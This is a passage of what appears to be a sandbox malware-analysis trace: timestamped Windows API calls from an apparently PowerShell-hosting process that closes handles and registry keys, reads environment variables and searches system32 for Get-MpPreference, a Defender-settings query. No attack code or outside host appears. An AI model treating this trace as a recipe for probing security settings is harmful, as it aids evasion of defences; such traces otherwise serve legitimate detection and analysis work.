HALPmcxz", pcbBuffer=0xae598) returned 1 [0079.351] ReportEventW (hEventLog=0x4e90004, wType=0x4, wCategory=0x4, dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d19624*="Stopped", lpRawData=0x2d194e0) returned 1 [0079.351] GetLastError () returned 0x0 [0079.352] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1 [0079.352] GetLastError () returned 0x0 [0079.354] CoGetContextToken (in: pToken=0xaf2c0 | out: pToken=0xaf2c0) returned 0x0 [0079.354] CObjectContext::QueryInterface () returned 0x0 [0079.354] CObjectContext::GetCurrentThreadType () returned 0x0 [0079.355] Release () returned 0x0 [0079.356] CoGetContextToken (in: pToken=0xaf098 | out: pToken=0xaf098) returned 0x0 [0079.356] CObjectContext::QueryInterface () returned 0x0 [0079.356] CObjectContext::GetCurrentThreadType () returned 0x0 [0079.356] Release () returned 0x0 [0079.359] CoGetContextToken (in: pToken=0xaf098 | out: pToken=0xaf098) returned 0x0 [0079.359] CObjectContext::QueryInterface () returned 0x0 [0079.359] CObjectContext::GetCurrentThreadType () returned 0x0 [0079.359] Release () returned 0x0 [0079.369] CoGetContextToken (in: pToken=0xaf098 | out: pToken=0xaf098) returned 0x0 [0079.369] CObjectContext::QueryInterface () returned 0x0 [0079.369] CObjectContext::GetCurrentThreadType () returned 0x0 [0079.369] Release () returned 0x0 [0079.408] CoGetContextToken (in: pToken=0xaf078 | out: pToken=0xaf078) returned 0x0 [0079.408] CObjectContext::QueryInterface () returned 0x0 [0079.408] CObjectContext::GetCurrentThreadType () returned 0x0 [0079.408] Release () returned 0x0 [0079.410] CoUninitialize () Thread: id = 70 os_tid = 0x844 Thread: id = 71 os_tid = 0x854 Thread: id = 72 os_tid = 0x864 Thread: id = 73 os_tid = 0x874 Thread: id = 74 os_tid = 0x884 [0069.469] CoGetContextToken (in: pToken=0x4a8f3e8 | out: pToken=0x4a8f3e8) returned 0x0 [0069.469] CObjectContext::QueryInterface () returned 0x0 [0069.469] CObjectContext::GetCurrentThreadType () returned 0x0 [0069.469] Release () returned 0x0 [0069.469] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0075.237] LocalFree (hMem=0x573a98) returned 0x0 [0075.237] GetLastError () returned 0x0 [0075.237] CloseHandle (hObject=0x34c) returned 1 [0075.237] GetLastError () returned 0x0 [0075.237] CloseHandle (hObject=0x13) returned 1 [0075.238] GetLastError () returned 0x0 [0075.238] CloseHandle (hObject=0xf) returned 1 [0075.238] GetLastError () returned 0x0 [0075.238] RegCloseKey (hKey=0x330) returned 0x0 [0075.238] RegCloseKey (hKey=0x32c) returned 0x0 [0075.238] RegCloseKey (hKey=0x328) returned 0x0 [0075.239] LocalFree (hMem=0x573ab8) returned 0x0 [0075.239] GetLastError () returned 0x0 [0075.239] RegCloseKey (hKey=0x358) returned 0x0 [0076.452] RegCloseKey (hKey=0x358) returned 0x0 [0078.129] RegCloseKey (hKey=0x3a4) returned 0x0 [0078.129] RegCloseKey (hKey=0x3a0) returned 0x0 [0078.129] RegCloseKey (hKey=0x39c) returned 0x0 [0078.129] RegCloseKey (hKey=0x32c) returned 0x0 [0078.130] RegCloseKey (hKey=0x3d0) returned 0x0 [0078.130] RegCloseKey (hKey=0x394) returned 0x0 [0078.130] RegCloseKey (hKey=0x390) returned 0x0 [0078.130] RegCloseKey (hKey=0x38c) returned 0x0 [0078.130] RegCloseKey (hKey=0x388) returned 0x0 [0078.131] RegCloseKey (hKey=0x384) returned 0x0 [0078.131] RegCloseKey (hKey=0x380) returned 0x0 [0078.131] RegCloseKey (hKey=0x37c) returned 0x0 [0078.131] RegCloseKey (hKey=0x378) returned 0x0 [0078.131] RegCloseKey (hKey=0x3cc) returned 0x0 [0078.132] RegCloseKey (hKey=0x3c8) returned 0x0 [0078.132] RegCloseKey (hKey=0x370) returned 0x0 [0078.132] RegCloseKey (hKey=0x36c) returned 0x0 [0078.132] RegCloseKey (hKey=0x368) returned 0x0 [0078.133] RegCloseKey (hKey=0x364) returned 0x0 [0078.133] RegCloseKey (hKey=0x360) returned 0x0 [0078.133] RegCloseKey (hKey=0x35c) returned 0x0 [0078.133] RegCloseKey (hKey=0x34c) returned 0x0 [0078.133] RegCloseKey (hKey=0x330) returned 0x0 [0078.134] RegCloseKey (hKey=0x328) returned 0x0 [0078.134] RegCloseKey (hKey=0x358) returned 0x0 [0078.134] RegCloseKey (hKey=0x3c4) returned 0x0 [0078.134] RegCloseKey (hKey=0x3c0) returned 0x0 [0078.134] RegCloseKey (hKey=0x3bc) returned 0x0 [0078.134] RegCloseKey (hKey=0x398) returned 0x0 [0078.135] RegCloseKey (hKey=0x420) returned 0x0 [0078.135] RegCloseKey (hKey=0x3d4) returned 0x0 [0078.135] RegCloseKey (hKey=0x3b4) returned 0x0 [0078.135] RegCloseKey (hKey=0x3b0) returned 0x0 [0078.135] RegCloseKey (hKey=0x3ac) returned 0x0 [0078.136] RegCloseKey (hKey=0x3a8) returned 0x0 [0079.358] GetLastError () returned 0x0 [0079.358] GetLastError () returned 0x0 [0079.358] LocalFree (hMem=0x557cb8) returned 0x0 [0079.359] GetLastError () returned 0x0 [0079.359] GetLastError () returned 0x0 [0079.359] GetLastError () returned 0x0 [0079.359] LocalFree (hMem=0x557c30) returned 0x0 [0079.359] GetLastError () returned 0x0 [0079.369] DeregisterEventSource (hEventLog=0x4e90004) returned 1 [0079.370] GetLastError () returned 0x0 [0079.382] CloseHandle (hObject=0x5f) returned 1 [0079.383] GetLastError () returned 0x0 [0079.383] CloseHandle (hObject=0x5b) returned 1 [0079.383] GetLastError () returned 0x0 [0079.384] CloseHandle (hObject=0x57) returned 1 [0079.384] GetLastError () returned 0x0 [0079.384] CloseHandle (hObject=0x53) returned 1 [0079.384] GetLastError () returned 0x0 [0079.385] CloseHandle (hObject=0x4f) returned 1 [0079.385] GetLastError () returned 0x0 [0079.385] CloseHandle (hObject=0x4b) returned 1 [0079.385] GetLastError () returned 0x0 [0079.386] CloseHandle (hObject=0x47) returned 1 [0079.386] GetLastError () returned 0x0 [0079.386] CloseHandle (hObject=0x43) returned 1 [0079.386] GetLastError () returned 0x0 [0079.387] CloseHandle (hObject=0x3f) returned 1 [0079.387] GetLastError () returned 0x0 [0079.387] CloseHandle (hObject=0x3b) returned 1 [0079.387] GetLastError () returned 0x0 [0079.388] CloseHandle (hObject=0x37) returned 1 [0079.388] GetLastError () returned 0x0 [0079.388] CloseHandle (hObject=0x33) returned 1 [0079.388] GetLastError () returned 0x0 [0079.389] CloseHandle (hObject=0x2f) returned 1 [0079.389] GetLastError () returned 0x0 [0079.389] CloseHandle (hObject=0x2b) returned 1 [0079.390] GetLastError () returned 0x0 [0079.390] CloseHandle (hObject=0x27) returned 1 [0079.390] GetLastError () returned 0x0 [0079.390] CloseHandle (hObject=0x23) returned 1 [0079.391] GetLastError () returned 0x0 [0079.391] CloseHandle (hObject=0x420) returned 1 [0079.391] GetLastError () returned 0x0 [0079.391] UnmapViewOfFile (lpBaseAddress=0x5280000) returned 1 [0079.392] CloseHandle (hObject=0x1f) returned 1 [0079.392] GetLastError () returned 0x0 [0079.392] CloseHandle (hObject=0x418) returned 1 [0079.392] GetLastError () returned 0x0 [0079.392] CloseHandle (hObject=0x414) returned 1 [0079.393] GetLastError () returned 0x0 [0079.393] CloseHandle (hObject=0x410) returned 1 [0079.393] GetLastError () returned 0x0 [0079.393] CloseHandle (hObject=0x40c) returned 1 [0079.393] GetLastError () returned 0x0 [0079.393] CloseHandle (hObject=0x408) returned 1 [0079.393] GetLastError () returned 0x0 [0079.393] CloseHandle (hObject=0x1b) returned 1 [0079.394] GetLastError () returned 0x0 [0079.394] CloseHandle (hObject=0x404) returned 1 [0079.394] GetLastError () returned 0x0 [0079.394] CloseHandle (hObject=0x3fc) returned 1 [0079.394] GetLastError () returned 0x0 [0079.394] CloseHandle (hObject=0x3f8) returned 1 [0079.394] GetLastError () returned 0x0 [0079.395] CloseHandle (hObject=0x3f4) returned 1 [0079.395] GetLastError () returned 0x0 [0079.395] CloseHandle (hObject=0x3f0) returned 1 [0079.395] GetLastError () returned 0x0 [0079.395] CloseHandle (hObject=0x3ec) returned 1 [0079.395] GetLastError () returned 0x0 [0079.395] CloseHandle (hObject=0x3e8) returned 1 [0079.395] GetLastError () returned 0x0 [0079.396] CloseHandle (hObject=0x17) returned 1 [0079.396] GetLastError () returned 0x0 [0079.396] CloseHandle (hObject=0x13) returned 1 [0079.396] GetLastError () returned 0x0 [0079.397] RegCloseKey (hKey=0x370) returned 0x0 [0079.397] CloseHandle (hObject=0x36c) returned 1 [0079.397] GetLastError () returned 0x0 [0079.397] CloseHandle (hObject=0x368) returned 1 [0079.397] GetLastError () returned 0x0 [0079.397] CloseHandle (hObject=0x364) returned 1 [0079.397] GetLastError () returned 0x0 [0079.398] CloseHandle (hObject=0x360) returned 1 [0079.398] GetLastError () returned 0x0 [0079.398] CloseHandle (hObject=0x35c) returned 1 [0079.398] GetLastError () returned 0x0 [0079.398] CloseHandle (hObject=0x34c) returned 1 [0079.398] GetLastError () returned 0x0 [0079.398] CloseHandle (hObject=0x330) returned 1 [0079.398] GetLastError () returned 0x0 [0079.398] CloseHandle (hObject=0x328) returned 1 [0079.398] GetLastError () returned 0x0 [0079.399] CloseHandle (hObject=0x358) returned 1 [0079.399] GetLastError () returned 0x0 [0079.399] CloseHandle (hObject=0x3c4) returned 1 [0079.399] GetLastError () returned 0x0 [0079.399] CloseHandle (hObject=0x3c0) returned 1 [0079.399] GetLastError () returned 0x0 [0079.399] CloseHandle (hObject=0x3bc) returned 1 [0079.399] GetLastError () returned 0x0 [0079.400] CloseHandle (hObject=0x398) returned 1 [0079.400] GetLastError () returned 0x0 [0079.400] CloseHandle (hObject=0xf) returned 1 [0079.400] GetLastError () returned 0x0 [0079.400] CloseHandle (hObject=0x7f) returned 1 [0079.401] GetLastError () returned 0x0 [0079.401] CloseHandle (hObject=0x7b) returned 1 [0079.401] GetLastError () returned 0x0 [0079.401] CloseHandle (hObject=0x77) returned 1 [0079.402] GetLastError () returned 0x0 [0079.402] CloseHandle (hObject=0x73) returned 1 [0079.402] GetLastError () returned 0x0 [0079.403] CloseHandle (hObject=0x41c) returned 1 [0079.403] GetLastError () returned 0x0 [0079.403] CloseHandle (hObject=0x6f) returned 1 [0079.403] GetLastError () returned 0x0 [0079.403] CloseHandle (hObject=0x6b) returned 1 [0079.404] GetLastError () returned 0x0 [0079.404] CloseHandle (hObject=0x344) returned 1 [0079.404] GetLastError () returned 0x0 [0079.404] UnmapViewOfFile (lpBaseAddress=0x27a0000) returned 1 [0079.405] CloseHandle (hObject=0x354) returned 1 [0079.405] GetLastError () returned 0x0 [0079.405] RegCloseKey (hKey=0x80000004) returned 0x0 [0079.405] CloseHandle (hObject=0x310) returned 1 [0079.405] GetLastError () returned 0x0 [0079.406] CloseHandle (hObject=0x67) returned 1 [0079.406] GetLastError () returned 0x0 [0079.406] CloseHandle (hObject=0x63) returned 1 [0079.406] GetLastError () returned 0x0 Thread: id = 75 os_tid = 0x894 [0078.012] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0078.020] SetThreadUILanguage (LangId=0x0) returned 0x409 [0078.028] VirtualQuery (in: lpAddress=0x5dce190, lpBuffer=0x5dcf190, dwLength=0x1c | out: lpBuffer=0x5dcf190*(BaseAddress=0x5dce000, AllocationBase=0x5440000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0078.032] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5c82a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0078.032] GetLastError () returned 0xcb [0078.036] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5c82a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0078.036] GetLastError () returned 0xcb [0078.038] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5c82a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0078.038] GetLastError () returned 0xcb [0078.055] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5c82a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0078.055] GetLastError () returned 0xcb [0078.058] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5c82a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0078.058] GetLastError () returned 0xcb [0078.059] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5c82a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0078.059] GetLastError () returned 0xcb [0078.076] VirtualQuery (in: lpAddress=0x5dce2ac, lpBuffer=0x5dcf2ac, dwLength=0x1c | out: lpBuffer=0x5dcf2ac*(BaseAddress=0x5dce000, AllocationBase=0x5440000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0078.077] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5c82a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0078.077] GetLastError () returned 0xcb [0078.079] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5c82a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0078.079] GetLastError () returned 0xcb [0078.079] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5c82a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0078.079] GetLastError () returned 0xcb [0078.088] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5c82a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0078.089] GetLastError () returned 0xcb [0078.175] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5c82a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0078.175] GetLastError () returned 0xcb [0078.217] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5c82a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0078.217] GetLastError () returned 0xcb [0078.219] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5c82a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0078.219] GetLastError () returned 0xcb [0078.220] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5c82a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0078.220] GetLastError () returned 0xcb [0078.222] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5c82a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0078.222] GetLastError () returned 0xcb [0078.223] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5c82a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0078.223] GetLastError () returned 0xcb [0078.224] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5c82a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0078.224] GetLastError () returned 0xcb [0078.225] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5c82a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0078.226] GetLastError () returned 0xcb [0078.258] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5c82a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0078.258] GetLastError () returned 0xcb [0078.336] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x5c82f8, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0078.336] GetLastError () returned 0xcb [0078.341] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x5c82f8, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0078.341] GetLastError () returned 0xcb [0078.352] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x5c8ef8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0078.352] GetLastError () returned 0xcb [0078.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0078.366] GetLastError () returned 0xcb [0078.367] SetErrorMode (uMode=0x1) returned 0x1 [0078.370] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.ps1", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.370] GetLastError () returned 0x2 [0078.370] SetErrorMode (uMode=0x1) returned 0x1 [0078.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0078.373] GetLastError () returned 0x2 [0078.373] SetErrorMode (uMode=0x1) returned 0x1 [0078.373] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.psm1", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.373] GetLastError () returned 0x2 [0078.373] SetErrorMode (uMode=0x1) returned 0x1 [0078.373] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0078.373] GetLastError () returned 0x2 [0078.373] SetErrorMode (uMode=0x1) returned 0x1 [0078.373] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.psd1", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.373] GetLastError () returned 0x2 [0078.373] SetErrorMode (uMode=0x1) returned 0x1 [0078.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0078.374] GetLastError () returned 0x2 [0078.374] SetErrorMode (uMode=0x1) returned 0x1 [0078.374] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.COM", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.374] GetLastError () returned 0x2 [0078.374] SetErrorMode (uMode=0x1) returned 0x1 [0078.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0078.374] GetLastError () returned 0x2 [0078.374] SetErrorMode (uMode=0x1) returned 0x1 [0078.374] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.EXE", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.374] GetLastError () returned 0x2 [0078.374] SetErrorMode (uMode=0x1) returned 0x1 [0078.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0078.374] GetLastError () returned 0x2 [0078.375] SetErrorMode (uMode=0x1) returned 0x1 [0078.375] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.BAT", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.375] GetLastError () returned 0x2 [0078.375] SetErrorMode (uMode=0x1) returned 0x1 [0078.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0078.375] GetLastError () returned 0x2 [0078.375] SetErrorMode (uMode=0x1) returned 0x1 [0078.375] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.CMD", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.375] GetLastError () returned 0x2 [0078.375] SetErrorMode (uMode=0x1) returned 0x1 [0078.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0078.375] GetLastError () returned 0x2 [0078.376] SetErrorMode (uMode=0x1) returned 0x1 [0078.376] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.VBS", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.376] GetLastError () returned 0x2 [0078.376] SetErrorMode (uMode=0x1) returned 0x1 [0078.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0078.376] GetLastError () returned 0x2 [0078.376] SetErrorMode (uMode=0x1) returned 0x1 [0078.376] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.VBE", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.376] GetLastError () returned 0x2 [0078.376] SetErrorMode (uMode=0x1) returned 0x1 [0078.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0078.377] GetLastError () returned 0x2 [0078.377] SetErrorMode (uMode=0x1) returned 0x1 [0078.377] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.JS", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.377] GetLastError () returned 0x2 [0078.377] SetErrorMode (uMode=0x1) returned 0x1 [0078.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0078.377] GetLastError () returned 0x2 [0078.377] SetErrorMode (uMode=0x1) returned 0x1 [0078.377] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.JSE", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.377] GetLastError () returned 0x2 [0078.377] SetErrorMode (uMode=0x1) returned 0x1 [0078.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0078.378] GetLastError () returned 0x2 [0078.378] SetErrorMode (uMode=0x1) returned 0x1 [0078.378] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.WSF", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.378] GetLastError () returned 0x2 [0078.378] SetErrorMode (uMode=0x1) returned 0x1 [0078.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0078.378] GetLastError () returned 0x2 [0078.378] SetErrorMode (uMode=0x1) returned 0x1 [0078.378] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.WSH", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.378] GetLastError () returned 0x2 [0078.378] SetErrorMode (uMode=0x1) returned 0x1 [0078.379] GetFullPathNameW (in: 